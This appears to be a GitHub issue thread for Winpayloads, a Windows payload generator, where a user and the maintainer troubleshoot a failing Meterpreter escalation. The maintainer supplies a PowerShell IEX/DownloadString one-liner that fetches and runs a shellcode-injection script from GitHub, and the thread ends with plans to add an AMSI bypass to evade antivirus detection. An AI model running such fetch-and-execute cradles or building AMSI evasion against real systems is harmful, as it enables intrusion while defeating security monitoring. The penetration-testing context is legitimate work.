nccgroup / Winpayloads

Undetectable Windows Payload Generation
Apache License 2.0

Payload not executing #72

Open ghost opened 5 years ago

ghost commented 5 years ago

Stager works but when trying to elevate to a meterpreter session the payload fails to execute. Generating a binary and executing it on the target machine works fine though.

Charliedean commented 5 years ago

Hi, are you using the Docker image or the install?

ghost commented 5 years ago

I'm using the Docker image.

Charliedean commented 5 years ago

Hi Nteiv,

I have just pulled the current Docker version and tested it on Ubuntu and my Windows 10 VM and can confirm that it is working for me. This could be an issue with your Windows environment.

Is there any AV running on the Windows device?

nteiv commented 5 years ago

(screenshot attached)

It's a fresh Windows 10 Pro VM. There are no other antivirus solutions on the machine. As you can see, the stager works and I'm able to get a reverse shell back, and I'm also able to execute PowerShell commands. But when trying to elevate to a Meterpreter session it just hangs. I've also tried running the custom shellcode execution module with a simple WinExec calc.exe and, again, get nothing.

Charliedean commented 5 years ago

OK. Based on this evidence it seems like there is an issue with the Invoke-Shellcode PowerShell module.

Could you please let me know your Windows version: run winver in the Run dialog (WIN + R)

and also run the following in PowerShell:

IEX (New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/Charliedean/InvokeShellcode1803/master/Invoke-Shellcode.ps1")

This will download and import the Invoke-Shellcode module temporarily. You can then test if it's working by executing Invoke-Shellcode and accepting the prompt. If there are no errors, calc.exe should open.

nteiv commented 5 years ago

That one-liner will get picked up by AMSI

(screenshot attached)

so I'm guessing the program doesn't do any obfuscation either?

Charliedean commented 5 years ago

Hi nteiv,

I will look into implementing AMSI bypass on Monday. Thank you for bringing this to my attention. The following looks promising as somewhere to start: https://github.com/kmkz/Pentesting/blob/master/AMSI-Bypass.ps1